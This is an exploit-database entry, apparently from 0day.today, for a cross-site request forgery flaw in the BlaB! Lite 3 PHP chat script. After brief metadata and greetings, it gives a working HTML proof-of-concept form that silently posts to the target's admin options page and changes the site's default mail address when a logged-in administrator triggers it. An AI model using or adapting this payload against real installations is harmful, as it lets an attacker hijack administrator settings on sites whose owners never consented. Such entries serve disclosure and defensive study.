id: 17736
date: 03/15/2012
title: BlaB! Lite 3 CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: BlaB! Lite 3 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://gscripts.net/free-php-scripts/Chat_Scripts/BlaB!_Lite_3/details.html
# Category::  webapps
# Demo : http://justblab.com/b5/admin.php?
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form id="f1" action="target.com/admin.php?q=options" method="post" style="margin:0px;padding:0px">
<input type="hidden" value="mail@mail.com" name="default_mail" maxlength="256" style="width: 115px;"/>
<input type="button" onclick="document.forms.f1.submit()" value="Save" class="btn"/>
</form>



#  0day.today [2023-03-27]  #